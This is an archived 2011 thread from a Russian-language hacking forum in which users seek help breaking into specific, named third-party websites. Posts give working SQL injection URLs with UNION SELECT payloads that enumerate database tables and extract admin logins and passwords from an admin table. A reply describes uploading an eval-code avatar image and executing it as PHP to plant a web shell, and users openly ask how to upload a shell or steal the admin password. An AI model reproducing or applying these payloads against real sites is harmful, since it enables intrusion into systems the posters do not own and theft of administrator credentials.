ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.09.2011, 16:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Нашел вот это.
http://uk.generic4all.com/upload_files/product_images/product_image_173_small.png/x.php
Каким образом здесь залить шелл, или это не возможно?
|
|
|
|
28.09.2011, 17:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Регайся в ресурсе и загрузи в профиле eval аватарку и так же вызови файл
http://uk.generic4all.com/upload_files/product_images/myevilavatar.png/.php
прочитай еще это http://habrahabr.ru/blogs/sysadm/100961/
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
28.09.2011, 21:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю.
http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null, null,null+--+
|
|
|
|
30.09.2011, 13:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
Сообщение от None
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201, 2,3,4,concat(table_schema,0x2e,TABLE_NAME)%20FROM% 20INFORMATION_SCHEMA.TABLES#
Что мсжно делать дальше?
|
|
|
|
30.09.2011, 13:18
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от .Light.
.Light. said:
Что мсжно делать дальше?
Код HTML:
HTML:
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES
|
|
|
|
30.09.2011, 15:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
Сообщение от d1v
d1v said:
Код HTML:
HTML:
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201,2,3,4,group_concat(TABLE_NAME)%20FROM%20INFORMATION_SCHEMA.TABLES
Как можно залить шелл??Или выдернуть пасс админа?
|
|
|
|
30.09.2011, 15:17
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от .Light.
.Light. said:
Как можно залить шелл??Или выдернуть пасс админа?
а ты статейки почитай милок...не все же за тебя делать надо.
|
|
|
|
30.09.2011, 15:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
65956
Репутация:
0
|
|
Сообщение от Gorev
Gorev said:
а ты статейки почитай милок...не все же за тебя делать надо.
До меня быстрей доходит на примерах.
|
|
|
|
30.09.2011, 17:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от er9j6@
er9j6@ said:
Какая установлена база на сайте? MySQL, Orale, PostgreSQL и Ibase не определяются , что дальше делать не знаю.
http://www.pharmaoffshore[antigoogle].com/customer_testimonials.php?testimonial_id=-4+union+select+null,null,null,null,null,null,null, null,null+--+
Если честно - я не увидел тут скулю.
|
|
|
|
30.09.2011, 17:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
60692
Репутация:
6
|
|
>До меня быстрей доходит на примерах.
Сообщение от None
http://board.biznews.com.ua/export.php?t=php&n=5&c=0&r=455+UNION%20SELECT%201, 2,3,4,group_concat(login,0x3a,password)%20FROM%20j b_admin
И мне помогите со скульей:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//cdo.kz/ru/default/index/search?q={SQL-CODE}[/COLOR][/COLOR]
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
